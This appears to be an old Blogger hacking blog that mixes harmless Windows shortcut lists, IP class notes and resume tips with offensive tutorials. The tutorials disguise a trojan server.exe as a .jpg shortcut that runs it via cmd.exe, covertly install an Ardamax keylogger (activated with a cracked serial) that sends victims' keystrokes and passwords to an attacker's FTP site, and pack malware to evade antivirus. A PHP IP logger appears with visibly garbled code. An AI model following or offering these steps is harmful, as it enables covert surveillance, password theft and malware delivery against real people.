This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Download unlimited from rapidshare without software

It's work best for me,
Every times i reach limited download from rapidshare, i always change date\time to next day so i can
download again .
Tell me if it work for yo

Converting .exe files to .jpg server.exe

Converting .exe files to .jpg (



1. Firstly, create a new folder and make sure that the options 'show hidden files' is checked and ‘hide extensions for
known file types’ is unchecked. Basically what u need is to see hidden files and see the extension of all your files on
your pc.

2. Paste a copy of your server on the new created folder. let's say it's called server.exe
(that's why you need the extension of files showing, cause you need to see it to change it)

3. Now you’re going to rename this server.exe to whatever you want, let’s say for example picture.jpeg

4. Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5. Now create a shortcut of this picture.jpeg in the same folder.

6. Now that you have a shortcut, rename it to whatever you want, for example, me.jpeg.

7. Go to properties (on file me.jpeg) and now you need to do some changes there.

8. First of all delete all the text on field START IN and leave it empty.

9. Then on field TARGET you need to write the path to open the other file (the server renamed picture.jpeg) so u
have to write this: C:\WINDOWS\system32\cmd.exe /c picture.jpeg

10. The last field, c picture.jpeg is always the name of the first file. If you called the first file soccer.avi you
gotta write C:\WINDOWS\system32\cmd.exe /c soccer.avi got it?

11. So what you’re doing is when someone clicks on me.jpeg, a cmd will execute the other file picture.jpeg and the
server will run.

12. On that file me.jpeg (shortcut), go to properties and you have an option to change the icon. click that and a
new window will pop up and u have to write this: %SystemRoot%\system32\SHELL32.dll . Then press OK.

13. You can set the properties HIDDEN for the first file (picture.jpeg) if you think it’s better to get a connection
from someone.

14. But don’t forget one thing, these 2 files must always be together in the same folder and to get connected
to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want
considering the person and the knowledge they have on this matter.

15. For me for example I always want the shortcut showing first so can be the first file to be opened.
So I rename the server to picture2.jpeg and the shortcut to picture 1.jpeg. This way the shortcut will show up first.
If you set hidden properties to the server (picture.jpeg) then u don’t have to bother with this detail but I’m warning
you, the hidden file will always show up inside of a zip file or rar.

16. So the best way to send these files together to someone is compress them into zip or rar.

17. inside the RAR or ZIP file you can see the files properties and even after all this work you can see that the
shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to
open it.


Originally written by Cm2, i rewrote it :).

Some Serious Hacking Tools Around for begginers



Here are some pics of some simple and basic hacking tools used by some Novice and just starting out "crackers" out there.There is no need for unix,linux stuff & other computing thing to use it.just have the tools & there u goes. These thing should not be out there but "meron kasing makukulit na "want to see other info not their own. These are backdoor program (trojan spy gen) and some hacking stuffs..used for stealing your passwords -"password lang naman ng..ie..yahoo id nyo" using the the 3rd of the possible way list below..

  • NetBIOS
  • ICMP Ping
  • FTP
  • rpc.statd
  • HTTP











there is more out there..laging i improve ur comp security and screen your sources olways specially in ur email..
We must always remember "Hacking is stealing and stealing is a Crime".



AddThis Social Bookmark Button


HowTo: code a PHP i.p address logger


I'm board so im going to post some this up ..

ok 1st of your going to need website hosting to do this, if you all ready have some then your set if not try looking at

www.0php.com
http://www.free-webhosts.com/free-php-webhosting.php

you can find free hosting there ok now..

open up a new notepad call it " iplogs.txt "

Upload it where eva you want this i.p logger on your server now change the permissions of that txt file to 777 so that the php script can read, write, execute the txt file
ok then now it is time for the coding part

$log_file = "iplogs.txt";
$hourdiff = "-8";
$timeadjust = ($hourdiff * 60 * 60);
$date = date("l, d F Y \t h:i a",time() + $timeadjust);
$ie = getenv('HTTP_USER_AGENT');
72.232.13.146 = getenv('REMOTE_ADDR');
$ia = $_SERVER["HTTP_REFERER"];
$fp = fopen("$log_file", "a");
fputs($fp, "$iprn");
flock($fp, 3);
fwrite($fp,$date);
fwrite($fp,"\t");
fwrite($fp,$ip);
fwrite($fp,"\t\t");
fwrite($fp,$ie);
fwrite($fp,"\t");
fwrite($fp,$ia);
fwrite($fp,"\n");
fclose($fp);
PRINT("Your Ip was logged $ip
");
?>


save it as anythink you want.php

ok 1st off i would like to say the 2nd last line can be edit for example :

PRINT("Your Ip was logged $ip how im going to hack you
");

or what eva you want to write but the $ip that show there i.p address on the page Smiley

ok upload it to the same spot as the iplogs.txt file and bamm your ready to go

type in the url of the .php and it will log this info to the text file

how change the permissions of that txt file to 777 "
Use an FTP program such as FileZilla, you can right click on the file and you can the permissions







AddThis Social Bookmark Button


ALL Shortcuts


These are the shortcuts i got from my frien and i want to share it with you all these r very usefull see this.

Accessibility Controls : access.cpl

Add Hardware Wizard : hdwwiz.cpl

Add/Remove Programs : appwiz.cpl

Administrative Tools : control admintools

Automatic Updates : wuaucpl.cpl

Bluetooth Transfer Wizard : fsquirt

Calculator : calc

Certificate Manager : certmgr.msc

Character Map : charmap

Check Disk Utility : chkdsk

Clipboard Viewer : clipbrd

Command Prompt : cmd

Component Services : dcomcnfg

Computer Management : compmgmt.msc

Date and Time Properties : timedate.cpl

DDE Shares : ddeshare

Device Manager : devmgmt.msc

Direct X Control Panel (If Installed)* : directx.cpl

Direct X Troubleshooter : dxdiag

Disk Cleanup Utility : cleanmgr

Disk Defragment : dfrg.msc

Disk Management : diskmgmt.msc

Disk Partition Manager : diskpart

Display Properties : control desktop

Display Properties : desk.cpl

RUN COMMANDS

I got this shortcuts from my friend and it is very usefull for daily internet surfers.
And daily computer users also . It is very usefull but you use only some features that you know
about it.

Run Commands
-----------------------------------------------------------
compmgmt.msc - Computer management
devmgmt.msc - Device manager
diskmgmt.msc - Disk management
dfrg.msc - Disk defrag
eventvwr.msc - Event viewer
fsmgmt.msc - Shared folders
gpedit.msc - Group policies
lusrmgr.msc - Local users and groups
perfmon.msc - Performance monitor
rsop.msc - Resultant set of policies
secpol.msc - Local security settings
services.msc - Various Services
msconfig - System Configuration Utility
regedit - Registry Editor
msinfo32 _ System Information
sysedit _ System Edit
win.ini _ windows loading information(also system.ini)
winver _ Shows current version of windows
mailto: _ Opens default email client
command _ Opens command prompt

Run Commands to access the control panel
-------------------------------------------------------------------
Add/Remove Programs control appwiz.cpl
Date/Time Properties control timedate.cpl
Display Properties control desk.cpl
FindFast control findfast.cpl
Fonts Folder control fonts
Internet Properties control inetcpl.cpl
Keyboard Properties control main.cpl keyboard
Mouse Properties control main.cpl
Multimedia Properties control mmsys.cpl
Network Properties control netcpl.cpl
Password Properties control password.cpl
Printers Folder control printers
Sound Properties control mmsys.cpl sounds
System Properties control sysdm.cpl

IP ADDRESS CLASS

I got this information from my friend i am providing this information to you .
I.P Address scheme .
I would like to provide all the information to you .
I will provide in other posts in future.
Total I.P address scheme is divided into 5 classes
CLASS A
CLASS B
CLASS C
CLASS D
CLASS E
CLASS A, CLASS B ,CLASS C I.P addresses
are used in LAN AND WAN
CLASS D is used for Multicasting
CLASS E is used for Research and development.

Range of I.P Addresses
CLASS A 0.0.0.0 ---------------------> 127.255.255.255
CLASS B 128.0.0.0 --------------------> 191.255.255.255
CLASS C 192.0.0.0 ---------------------> 223.255.255.255
CLASS D 224.0.0.0 ---------------------> 239.255.255.255
CLASS E 240.0.0.0 -------------------- > 255.255.255.255

Resume MAking Tips

I got this from my friend , this is very usefull.
follow these tips to build your resume and get a good impression on seeing you resume.

ALL THE BEST

Build Your Resume
Not only is your resumé the first thing an employer sees, it is what the employer will use to decide whether you move on to the next stage of the employment process. Make your first impression count.
Tailoring Your Resume To The Job
An effective resumé describes your education and experience that specifically relate to the job you are applying for. Your resumé is a written snapshot that should clearly support your career goal and be tailored to the particular position for which you are applying.
Have a specific job in mind when you are creating your resumé. Analyze job descriptions for the skills and abilities that employers are seeking. Read through descriptions, highlight the required skills, attributes and qualifications. Address three or four main areas in your resumé.
Assessing Your Skills & Accomplishments
Take some time to think about your accomplishments and create a list: things that you did well, enjoyed doing, and were proud of. Include education/training, volunteer opportunities, jobs, projects, school assignments, travel, and group/team activities. Describe in detail what you did, why you did it, who you did it with, what equipment you used, and what happened. Quantify your results, if possible, and use commonly understood terminology. Identify the personal strengths and skills that you use to achieve your accomplishments. Don't be humble; this is your chance to promote your skills and abilities.
Writing Your Resume
When asked what is most desirable in a job applicant, employers inevitably mention communication skills, rather than the number of years of industry experience an applicant has, the college from which he or she graduated, or even the company for which he or she last worked. Your ability to write correctly will influence your ability to get a job.
Being able to write well means you will present yourself better in your resumé and cover letter. You will be able to speak with confidence and will handle yourself better during interviews. Your thank you letters and follow-up correspondence will impress employers.
While composing your resume, write descriptive phrases. Write short phrases that describe what you did and illustrate each skill. Be concise and specific. Arrange the descriptive phrases in order of relevance to the position for which you are applying

Windowsxp Shortcuts

I got this shortcuts from my friend and it is very usefull for daily internet surfers.
And daily computer users also . It is very usefull but, you use only some features that you know
about it.



Windows XP Shortcuts
--------------------------------------------------------------
ALT+- (ALT+hyphen) Displays the Multiple Document Interface (MDI) child window's System menu
ALT+ENTER View properties for the selected item
ALT+ESC Cycle through items in the order they were opened
ALT+F4 Close the active item, or quit the active program
ALT+SPACEBAR Display the System menu for the active window
ALT+TAB Switch between open items
ALT+Underlined letter Display the corresponding menu
BACKSPACE View the folder one level up in My Computer or Windows Explorer
CTRL+A Select all
CTRL+B Bold
CTRL+C Copy
CTRL+I Italics
CTRL+O Open an item
CTRL+U Underline
CTRL+V Paste
CTRL+X Cut
CTRL+Z Undo
CTRL+F4 Close the active document
CTRL while dragging Copy selected item
CTRL+SHIFT while dragging Create shortcut to selected iteM
CTRL+RIGHT ARROW Move the insertion point to the beginning of the next word
CTRL+LEFT ARROW Move the insertion point to the beginning of the previous word
CTRL+DOWN ARROW Move the insertion point to the beginning of the next paragraph
CTRL+UP ARROW Move the insertion point to the beginning of the previous paragraph
SHIFT+DELETE Delete selected item permanently without placing the item in the Recycle Bin
ESC Cancel the current task
F1 Displays Help
F2 Rename selected item
F3 Search for a file or folder
F4 Display the Address bar list in My Computer or Windows Explorer
F5 Refresh the active window
F6 Cycle through screen elements in a window or on the desktop
F10 Activate the menu bar in the active program
SHIFT+F10 Display the shortcut menu for the selected item
CTRL+ESC Display the Start menu
SHIFT+CTRL+ESC Launches Task Manager
SHIFT when you insert a CD Prevent the CD from automatically playing
WIN Display or hide the Start menu
WIN+BREAK Display the System Properties dialog box
WIN+D Minimizes all Windows and shows the Desktop
WIN+E Open Windows Explorer
WIN+F Search for a file or folder
WIN+F+CTRL Search for computers
WIN+L Locks the desktop
WIN+M Minimize or restore all windows
WIN+R Open the Run dialog box
WIN+TAB Switch between open items

Windows Explorer Shortcuts

I got this shortcuts from my friend and it is very usefull for daily internet surfers.
And daily computer users also . It is very usefull but you use only some features that you know
about it.
Windows Explorer Shortcuts
-------------------------------------------------------------
ALT+SPACEBAR - Display the current window’s system menu
SHIFT+F10 - Display the item's context menu
CTRL+ESC - Display the Start menu
ALT+TAB - Switch to the window you last used
ALT+F4 - Close the current window or quit
CTRL+A - Select all items
CTRL+X - Cut selected item(s)
CTRL+C - Copy selected item(s)
CTRL+V - Paste item(s)
CTRL+Z - Undo last action
CTRL+(+) - Automatically resize the columns in the right hand pane
TAB - Move forward through options
ALT+RIGHT ARROW - Move forward to a previous view
ALT+LEFT ARROW - Move backward to a previous view
SHIFT+DELETE - Delete an item immediately
BACKSPACE - View the folder one level up
ALT+ENTER - View an item’s properties
F10 - Activate the menu bar in programs
F6 - Switch between left and right panes
F5 - Refresh window contents
F3 - Display Find application
F2 - Rename selected item




AddThis Social Bookmark Button


Ardamax Keylogger Tutorial

A step-by-step guide to successfully creating a deployment package, sending it, and receiving information using Ardamax Keylogger. Now, in this guide, I only use one method of recieving information, and that's an FTP. I also do not protect the files. Any suggestions and comments are appreciated. Let's begin.

Head on over to:

CODE
http://www.ardamax.com/keylogger/


And scroll to the bottom. Download the free trial.

After downloading, open the program and install it. Simple enough, right? After installing, go to wherever you installed it at, and open it. It should open at the bottom right corner of your screen, down by the time. If not, press ctrl+shift+alt+h. Now, leave that alone.

Next, go to:

CODE
http://www.theserials.com/serial/serial_ardamax.html


Download the appropriate serial.

Now, open it, and it should give you a name and a jumble of letters and numbers.

Go back to the Ardamax icon at the bottom right, and right-click it.

Click the "Enter Registration Key" button.

Use your serial/crack to unlock the full version. Congratulations, you are now ready to make your first deployment package.

~NOTE~

If you want to attach the keylogger to an existing file, go ahead and place that on your desktop.

~NOTE~

Again, right click the icon at the bottom-right.

Click "Remote Installation".

Click next.

Now, if you want to attach your keylogger to an existing file, tick the box that says "Append keylogger engine to.." etc etc.

If you tick it, click Browse, and select the file.

If not, continue down. The installation folder on target computer needs to remain Windows System Folder for added security, so leave it be.

Add any additional components you would like. I just leave mine as "log viewer" since all I grab are passwords from games.

From this point, click next.

Now, this part is self explanatory. I tick all of the boxes, as to hide it from everything visible, otherwise they can just see it and be like "Wtf", uninstall, etc.

Can't have that, now can we?

Click next.

For Security, do what you want. I leave all of it as-is and click next again.

Now, untick the "Check for updates" box, else it will check for updates on their computer and they will know that they are bugged.

Click next.

Tick the "Start in hidden mode" box, and leave the "Run on windows startup" as-is.

You may pick a date to self destruct, if you like. Sounds noisy, right? It simply removes itself on selected date. If not, leave it alone, and it will never self destruct.

Click next.

Tick the "Send logs every.." box, and choose how frequently you would like to recieve information that has been sent.

Select 'FTP' and de-select everything else as a delivery method.

You may choose what you want to see. I take out screenshots. Causes lag for me.

Leave log format alone.

You may choose to send logs if it exceeds a certain size, or if you want it to send no matter what, untick the box, which is what I do.

Continue on! (next.)

Now the fun part. -_-.

Head on over to:

CODE
http://phpnet.us/


Make an account, etc etc.

Save your FTP Account name and password. You'll need it in a moment.

This site will be the site that holds all information recieved by the keylogger.

When you're done, scroll down a bit.

Under "FTP Accounts", click "File Manager".

Near the top, click the "New Dir" button, and create a directory by any name you want. My favorite is "lolbeans".

Now, hold that thought. Bring the keylogger back.

In Ftp Host, put in:

ftp.phpnet.us

In "Remote Folder", put in the new directory's name you made. So, in this scenario, "lolbeans" without the "'s.

Fill in your Username and Password.

I leave Passive Mode checked because I'm not sure what it does, rofl. :[

Leave port alone as well. It's default.

Now to make sure everything is correctly done, click test. It should tell you it all went through. And to double check, you can refresh your open window. Click your "lolbeans" directory and there should be a test file in it.

Click next, if you're still alive.

Tick anything and everything you want.

Next.

If you selected screenshots to be enabled, pick how you want them delivered. Click next. If not, ignore this step.

Browse where you want the keylogger to be placed. You can also change the icon, which is nifty. If you're apologizing to a bitch ex girlfriend/boyfriend of yours, you can change the icon to a notepad and name it "Apology", and they fall for it.

Next.

This screen will go over with you everything that you have chosen. Make sure it's all correct.

Click Finish.

Now, if you appended the keylogger to something, you're going to need to put the "install" (feel free to rename it so it's not so obvious) and appended file into a .zip or .rar file.

If not, you have the simple "Install" on your desktop. Also, feel free to rename it to something like "Apology" or "OMFGFunnypicture!!!.jpg"

Upload the file or .rar/.zip somewhere, and let your target download it. They will double click it, and on their end, nothing will happen, but secretly, they have been keylogged.

Check your FTP Directory that you made as frequently as you told it to send logs, and you'll have everything you need.

Feel free to test it out on yourself.

How to make ALL Trojan/Virus/Keylogger UNDETECTABLE

This tutorial tells you how to make a Trojan, Virus, Keylogger, or anything that would be found harmful, NOT. This tutorial explains how to make all files look %100 clean (become clean and be %100 UNDETECTABLE from ALL ANTIVIRUSES!!!!! ALL!!!!!)


Ready? GO!

First, get your trojan, virus or keylogger, or server or w/e you plan on using to become undetectable, and get it ready. Fix it up, create it, whatever.

My personal favorite
keylogger: Ardamax Keylogger
Remote Administration Tool (Must not have a router): Poisin Ivy
Google is your friend.

Now that you have your trojan, virus or keylogger or w/e harmful ready, its time to make it UNDETECED!

1. Download Software Passport (Armadillo) by Silicon Realms. This is THE best binder out there I know of, it makes everything %100 UNDETECTABLE BY ALL ANTIVIRUSES (including Norton, Kaspersky, Avast, etc)... The direct link to dl the program is here:
Code:
http://nct.digitalriver.com/fulfill/0161.001

There is a form to fill out information, so put in your real email address, and then you'll recieve a download link in your email (it might be in Spam, Junk mail section so beware.)

2. Once you download the program, install it.
3. Once installed, you open it up and see this:
Code:
http://img339.imageshack.us/img339/6...assportzh3.jpg

This is the program. Now that you have it open, you might be confused on what the hell to do, right? Well, this is what you do!

1. Download this pre-made settings. These settings are pre-made by me so you won't be confused. Everything is working.

DOWNLOAD THIS FOR THE PRE-MADE SETTINGS:
Code:
http://rapidshare.com/files/8749860/projects.arm.html

DOWNLOAD THIS FOR THE BACKUP (You need this in the same location as the projects.arm file) YOU NEED THIS FILE ALSO!
Code:
http://rapidshare.com/files/8750048/projects.Stats.html


Now, when you download these files, and you put them in the SAME FOLDER (or same location), open Software Passport again and click Load Existing Project (top left).

Where it says "Files to Protect" (if theres stuff there, delete it):
Add the files you want to make %100 UNDETECTABLE!!

Now, once done, go to the bottom right and click "Build Project". A bunch of windows will come up, just click Yes and OK.

Now, once its created, they are %100 undetectable. Go to
Code:
virustotal.com
to scan it with every Antivirus, and they wont find ANYTHING!


„It takes a long time to learn simplicity.“



AddThis Social Bookmark Button